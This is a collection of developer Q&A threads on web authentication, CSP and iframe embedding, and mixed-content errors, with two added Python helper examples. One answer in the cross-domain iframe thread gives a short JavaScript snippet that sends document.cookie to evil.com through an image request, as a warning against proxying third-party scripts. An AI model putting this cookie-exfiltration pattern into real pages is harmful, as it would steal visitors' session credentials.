AMP page with basic authentication - basic-authentication

I have an AMP page which my client wants to test before we release it. We secure our client testing environment using basic authentication.
I'm using an AMP list with a JSON src attribute to template my list
<amp-list width="auto" height="720" layout="fixed-height" src="/amp/_data/mydata.json">
  <template type="amp-mustache" id="amp-template-id">
    <div>
      {{linkText}}
    </div>
  </template>
</amp-list>
When I load this page in Chrome the server responds with a 401, which suggests that assets on the page aren't being loaded using the basic authentication credentials used for the AMP page.
Without specifying the username and password in the URL (e.g. http://user:password#my.staging.server...), is there any way I can get additional requests to be made using the same basic authentication credentials as the AMP page?

It may be because you are using a relative URL for your JSON data?
It's my understanding that AMP generally discourages this because it won't be the correct link if the AMP page is delivered from AMP Cache.

Related

Access localStorage before page rendering in nextjs

I want the user to not be redirected to the login page on closing the website or browser once the user is logged in. For this I use localStorage. It is working successfully, but it works after page rendering in Next.js, so it gives me an error for 5 seconds. I want to access localStorage before page rendering in Next.js.
Local Storage is only available in the browser. It will not be available on the server (or while the page is doing any kind of server-side operation).
https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage
You should use a cookie to store this information if it needs to be accessible by both the server AND client.

Cross-domain loading of Angular UI within an iframe

We have a requirement to load an internally hosted Angular UI from within an external partner's secured website. We're using an OIDC auth flow calling to an internal IDP server to retrieve/validate the user tokens.
The problem is we are not able to make custom modifications to the internal IDP server's rules in order to allow the external partner's domain as being valid for calling to from within an iframe (Content Security Policy).
This causes us to get an error related to invalid Content Security Policy as the external partner's domain is not within the allowed domains list of the CSP. If we serve this UI in an iframe from within an internal company domain (allowed in the CSP) it works just fine.
Assuming we have to load our internal UI from within the partner's website inline (iframe or other), and authenticate our users using an OAuth pattern, are there any viable solutions for this problem?
I understand the CSP and X-Frame-Options headers are set this way to avoid click-jacking security risks, so not sure what is being asked of us is possible while remaining secure. Initial thought is to possibly put a proxy service between the partner's website and our UI and the proxy service will handle the authentication...bypassing the CSP rules...but does not necessarily seem secure, and not sure how to implement that even if so. Any thoughts or ideas would be welcomed. Thanks!
Proxying third-party scripts is a bad idea. Consider the script:
var Img = document.createElement("img");
Img.setAttribute('src', 'http://evil.com?cookie=' + document.cookie);
document.body.appendChild(Img);
Loaded from someone else's domain, the script will not have access to document.cookie. But after proxying, the browser treats the script as loaded from your domain, and will send cookies to the evil.com site.
Allowing your site to be embedded in an iframe opens the door to:
Clickjacking: by placing an invisible frame, it allows actions to be performed on behalf of a visitor if he is logged in at the third-party site.
Phishing: in the case of an iframe, the user does not see the real URL in the address bar. Therefore, an attacker can load an iframe from his domain that looks like a third-party authorization site. Since the visitor is not able to see this, he enters his login/password at the attacker's site.
Third-party scripts' access to some sensitive user data such as: geolocation, camera, microphone, speaker, mobile device sensors (accelerometer, gyroscope, ambient-light-sensor, magnetometer, vibrate) etc. See Feature Policy / Permissions Policy for how to restrict these.
For using your IDP server for authenticating a user on a third-party site, you MUST redirect to your domain, authenticate the user on your domain, and redirect the user back to the third-party site. To keep auth, a JWT token can be used or the third-party site can set its own auth cookie. The referrer is used to return to the partner's page where auth was started. Google's OAuth2 service works in this way.
It is not known what private/financial data your web application is dealing with, but it is unlikely that you want to be responsible for the actions of third parties by making a hole in the security system for them.
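The frame-ancestors decision behind the CSP error in the question above, as an added Python illustration (not code from any post or project on this page). It follows the CSP3 host-source matching rules in simplified form; the page and partner origins are constructed, and X-Frame-Options is not modelled.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

def _origin(url):
    """Reduce an origin URL to (scheme, host, port), filling in the default port."""
    u = urlsplit(url)
    scheme = u.scheme.lower()
    return scheme, u.hostname.lower(), u.port or DEFAULT_PORTS.get(scheme)

def _source_matches(source, page, ancestor):
    """Match one frame-ancestors source expression (CSP3 host-source rules, simplified)."""
    a_scheme, a_host, a_port = ancestor
    if source == "'self'":
        return ancestor == page
    if source == "'none'":
        return False
    if source.endswith(":") and "/" not in source:      # scheme-source such as https:
        return a_scheme == source[:-1].lower()
    scheme, _, rest = source.partition("://")
    if not rest:                                        # no scheme given in the source
        scheme, rest = "", source
    host, _, port = rest.partition(":")
    host = host.lower()
    if scheme and a_scheme != scheme.lower():
        return False
    if not scheme and a_scheme not in (page[0], "https"):  # schemeless: same scheme or https
        return False
    if host.startswith("*."):                           # wildcard never matches the bare domain
        if not a_host.endswith(host[1:]):
            return False
    elif host != "*" and a_host != host:
        return False
    if port == "*":
        return True
    if port:
        return a_port == int(port)
    return a_port == DEFAULT_PORTS.get(a_scheme)        # no port listed: only the default port

def frame_allowed(csp_header, page_origin, ancestor_origin):
    """True if a page served from page_origin with csp_header may be framed by ancestor_origin."""
    page, ancestor = _origin(page_origin), _origin(ancestor_origin)
    for directive in csp_header.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return any(_source_matches(s, page, ancestor) for s in parts[1:])
    return True  # no frame-ancestors directive: this header does not restrict framing
```

With a constructed policy such as `frame-ancestors 'self' https://*.internal.example` served by `https://ui.internal.example`, an internal host like `https://portal.internal.example` is allowed while `https://partner.example` is refused, which is exactly the situation the question describes; the only fix that keeps the protection is adding the partner's exact origin to the policy on the IDP side.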

Mixed Content: Iframe converting https call to http and the request gets blocked

We have a website which provides referral options for healthcare providers via digital signature. We are upgrading our website security policy to not redirect to the third-party website for e-signature. Instead of redirecting to the third-party website, we are trying to embed the third-party website inside our website for e-signature.
Now the technical question:
We are using an iFrame to embed the third-party website. We have a custom third-party link for each signature which needs to load in this iFrame.
Our website is on HTTPS and the third-party site is also on HTTPS.
We are getting the below error even though the third-party URL used is on https:
**The page at 'https://mywebsite.com/' was loaded over HTTPS, but requested an insecure resource 'http://MyThirdPartyIntegratedWebsite' This request has been blocked; the content must be served over HTTPS**
The URL is formed for each user and customized for his signature:
$scope.detailFrame = 'https://MyThirdPartyIntegratedWebsite/userID=123'
Whitelisted the third-party website too:
$sceDelegateProvider.resourceUrlWhitelist([
  // Allow same origin resource loads.
  'self',
  // Allow loading from our assets domain. Notice the difference between * and **.
  'https://MyThirdPartyIntegratedWebsite/**'
]);
How to stop the iFrame from calling the third-party website insecurely?
It was actually the internal redirects from the third-party website which were causing the problem. We initiated a call with them to resolve this. Thank you sideshowba

Blocked Access to geolocation was blocked over secure connection with mixed content

I'm using a plugin in WordPress that uses the Google Maps API but keep getting this error:
[blocked] Access to geolocation was blocked over secure connection with mixed content to...
My site is on SSL, and I've checked that the Google API script is not being pulled in via http (it is https as it should be).
I'm not sure what could be causing this issue. Maybe there is something I need to do in my .htaccess file? Please help! Thanks!
Check the list below:
Your site has http links instead of https links, which is why you are facing the mixed content warning (you can find this warning in your browser console). Find those links in your website and change them to https links.
Add a Google API key in the configuration.
https://developers.google.com/maps/documentation/javascript/get-api-key
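A scanner for the "find the http links in your page" step recommended above, as an added Python example that is not code from either of the two mixed-content threads (the e-signature iframe and the geolocation error). It resolves relative and scheme-relative URLs against the page URL before deciding; the sample page is constructed, and note that it cannot see a third party's own redirect to http, which is what the e-signature question turned out to be.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Attributes whose value the browser fetches as a subresource (iframes included,
# since both questions above embed third-party content).
FETCH_ATTRS = {
    "script": ("src",), "img": ("src",), "iframe": ("src",), "link": ("href",),
    "audio": ("src",), "video": ("src", "poster"), "source": ("src",), "object": ("data",),
}

class MixedContentScanner(HTMLParser):
    """Collect subresource URLs that an https page would fetch over plain http."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.findings = []   # (tag, attribute, absolute URL)

    def handle_starttag(self, tag, attrs):
        for attr in FETCH_ATTRS.get(tag, ()):
            value = dict(attrs).get(attr)
            if not value:
                continue
            absolute = urljoin(self.page_url, value.strip())  # resolves /path and //host forms
            if urlsplit(absolute).scheme == "http":
                self.findings.append((tag, attr, absolute))

def find_mixed_content(page_url, html):
    """Return the http:// subresources an https page references; an empty list means clean."""
    if urlsplit(page_url).scheme != "https":
        return []   # only a page served over https can have mixed content
    scanner = MixedContentScanner(page_url)
    scanner.feed(html)
    return scanner.findings

# Constructed sample page (not from the original posts): one plain-http script,
# one scheme-relative script, a same-origin stylesheet, an https iframe, a plain-http image.
SAMPLE_HTML = """
<html><head>
<script src="http://maps.googleapis.com/maps/api/js?key=PLACEHOLDER_KEY"></script>
<script src="//cdn.example/app.js"></script>
<link rel="stylesheet" href="/css/site.css">
</head><body>
<iframe src="https://MyThirdPartyIntegratedWebsite/userID=123"></iframe>
<img src="http://static.example/logo.png">
</body></html>
"""

if __name__ == "__main__":
    for tag, attr, url in find_mixed_content("https://mywebsite.com/", SAMPLE_HTML):
        print(f'mixed content: <{tag} {attr}="{url}">')
```

The scheme-relative `//cdn.example/app.js` and the relative stylesheet inherit https from the page and are not reported; only the two explicit `http://` references are.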

ASP.NET Website Madam routes css requests to wrong authentication module

I have an ASP .NET website which uses Forms authentication to secure certain parts of the site. The site has a module that uses custom Basic authentication.
I use Madam https://msdn.microsoft.com/en-us/library/aa479391.aspx to route a specified request.url to the Basic Authentication handler.
My Web.config specifies which requests go to basic authentication:
<madam>
  <formsAuthenticationDisposition>
    <discriminators all="true">
      <discriminator
        inputExpression="Request.Url"
        pattern="/RouteMeToBasicAuthentication"
        type="Madam.RegexDiscriminator" />
    </discriminators>
  </formsAuthenticationDisposition>
</madam>
As a result, requests to '/RouteMeToBasicAuthentication' are routed correctly to basic authentication.
I can log into my application using forms authentication.
The problem is that all .js and .css requests are routed to my Basic authentication module. These requests originate from Forms-authenticated .aspx pages. As a result all .js and .css requests are rejected as unauthorized:
1. Request URL: http://myApplication/Scripts/jquery-ui.min.js
2. Request Method: GET
3. Status Code: 401 Unauthorized
I do not want .js and .css requests forwarded to the basic authentication module. How do I do this? Why does Madam route these requests to Basic Authentication?
Without Madam, IIS assumes that resources such as .js, .jpg, etc. are all static resources, and thus doesn't need to pass them through the ASP.NET engine. I also do not want .js requests to go to the ASP.NET engine since it has a negative effect on application performance.
A dirty workaround would be to whitelist my css and js folders in the custom basic authentication module. I do not want to do that. I would like to have the problem fixed in the right place. How can I do that?